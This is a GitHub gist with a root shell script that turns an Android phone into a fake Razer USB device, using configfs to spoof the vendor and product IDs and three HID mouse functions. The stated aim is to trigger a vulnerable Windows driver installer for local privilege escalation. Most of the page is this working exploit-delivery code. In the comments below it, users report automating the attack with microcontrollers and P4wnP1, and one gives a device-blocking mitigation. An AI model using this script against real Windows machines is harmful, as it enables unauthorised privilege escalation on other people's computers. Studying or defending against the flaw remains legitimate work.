Skip to content

Instantly share code, notes, and snippets.

@tothi
Created August 22, 2021 09:52
Show Gist options
  • Save tothi/3cdec3aca80e08a406afe695d5448936 to your computer and use it in GitHub Desktop.
Save tothi/3cdec3aca80e08a406afe695d5448936 to your computer and use it in GitHub Desktop.
Razer USB gadget on Android for Local Privilege Escalation on Windows
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
#
# https://twitter.com/j0nh4t/status/1429049506021138437
# https://twitter.com/an0n_r0/status/1429263450748895236
#
# the script was developed & tested on Android LineageOS 18.1
# work as root
su
# enable CONFIGFS
mount -t configfs none /sys/kernel/config
# create gadget
mkdir /sys/kernel/config/usb_gadget/pwn_razer
cd /sys/kernel/config/usb_gadget/pwn_razer
# set vendor (Razer) & product id
# for a list of suitable devices see the inf files in driver cab archive
# (feel free to change the product id)
echo 0x1532 > idVendor
echo 0x023e > idProduct
# set USB version 2
echo 0x0200 > bcdUSB
# set device to class to Misc / Interface Association Descriptor.
echo 0xEF > bDeviceClass
echo 0x02 > bDeviceSubClass
echo 0x01 > bDeviceProtocol
# set some info strings
mkdir -p strings/0x409
echo "deadbeefdeadbeef" > strings/0x409/serialnumber
echo "an0n" > strings/0x409/manufacturer
echo "fake Razer device" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "basic Multi-function device with single TLC (MI_02)" > configs/c.1/strings/0x409/configuration
# set some fake power config values
echo 250 > configs/c.1/MaxPower
echo 0x80 > configs/c.1/bmAttributes
# add 3 mouse HID devices (protocol 2) with a basic HID report descriptor
for i in g1 g2 g3 ; do
mkdir -p functions/hid.${i}
echo 2 > functions/hid.${i}/protocol
echo 6 > functions/hid.${i}/report_length
echo BQEJAqEBCQGhAIUBBQkZASkDFQAlAZUDdQGBApUBdQWBAwUBCTAJMRWBJX91CJUCgQaVAnUIgQHAwAUBCQKhAQkBoQCFAgUJGQEpAxUAJQGVA3UBgQKVAXUFgQEFAQkwCTEVACb/f5UCdRCBAsDA | base64 -d > functions/hid.${i}/report_desc
done
# activate the HID devices
for i in g1 g2 g3 ; do
ln -s functions/hid.${i} configs/c.1/
done
# bind (for activating, disable default gadget and enable the new one)
# might need to be changed (if the active gadget is not in ../g1)
echo "" > ../g1/UDC ; getprop sys.usb.controller > UDC
@memerememe
Copy link

Any way i can test this out on a vm without it auto executing on my pc?

@synap5e
Copy link

synap5e commented Aug 25, 2021

Got my microcontroller working to trigger + automate this

pwn.mp4

@synap5e
Copy link

synap5e commented Aug 25, 2021

Any way I can test this out on a vm without it auto executing on my pc?

Should be able to use a USB filter in the VMs usb settings to get the raw-ish device on the VM.
You could look into some of the mitigations people have come up with for your host e.g. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731387(v=ws.10)?redirectedfrom=MSDN#step-1-create-a-list-of-prohibited-devices forUSB\VID_1532

@tothi
Copy link
Author

tothi commented Aug 25, 2021

Got my microcontroller working to trigger + automate this
pwn.mp4

awesome! :)

@memerememe
Copy link

Any way I can test this out on a vm without it auto executing on my pc?

Should be able to use a USB filter in the VMs usb settings to get the raw-ish device on the VM.
You could look into some of the mitigations people have come up with for your host e.g. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731387(v=ws.10)?redirectedfrom=MSDN#step-1-create-a-list-of-prohibited-devices forUSB\VID_1532

Thank you!!

@uraninite
Copy link

Got my microcontroller working to trigger + automate this
pwn.mp4

😮

@w0rm12
Copy link

w0rm12 commented Aug 27, 2021

Got my microcontroller working to trigger + automate this
pwn.mp4

Nice!!! Can you share the code?

@synap5e
Copy link

synap5e commented Sep 7, 2021

Got my microcontroller working to trigger + automate this
pwn.mp4

Nice!!! Can you share the code?

Sorry about the delay.
https://github.com/synap5e/razor-eop-XIAO

@linguine2552
Copy link

lol it even works with just basic PID and VID pairing for P4wnP1.
pwntemp

fyi > Razer patched spawning a simple shell.

@bananabr
Copy link

bananabr commented Apr 1, 2024

I know it's been a while, but is this still supposed to work? I know the vulnerability is patched by now, but I can't even make the co-installer run.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment